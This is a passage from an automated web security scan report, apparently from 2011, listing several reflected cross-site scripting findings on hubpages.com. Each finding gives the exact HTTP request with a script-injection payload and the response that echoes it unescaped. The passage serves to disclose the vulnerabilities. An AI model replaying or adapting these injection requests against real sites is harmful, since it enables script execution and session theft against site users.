Path:   /about/advertise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...
1.77. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...
1.78. http://hubpages.com/hubs/hot/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...
1.79. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&amp;rss" />
...[SNIP]...
1.80. http://hubpages.com/my/hubs/stats [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...
1.81. http://hubpages.com/my/hubs/stats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...
1.82. http://hubpages.com/my/hubs/stats [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...
1.83. http://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...
1.84. http://hubpages.com/topics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...
1.85. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...
1.86. http://hubpages.com/tour/affiliate [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...
1.87. http://hubpages.com/tour/affiliate [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...
1.88. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...
1.89. http://hubpages.com/user/new/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...
1.90. http://hubpages.com/user/new/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...
1.91. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
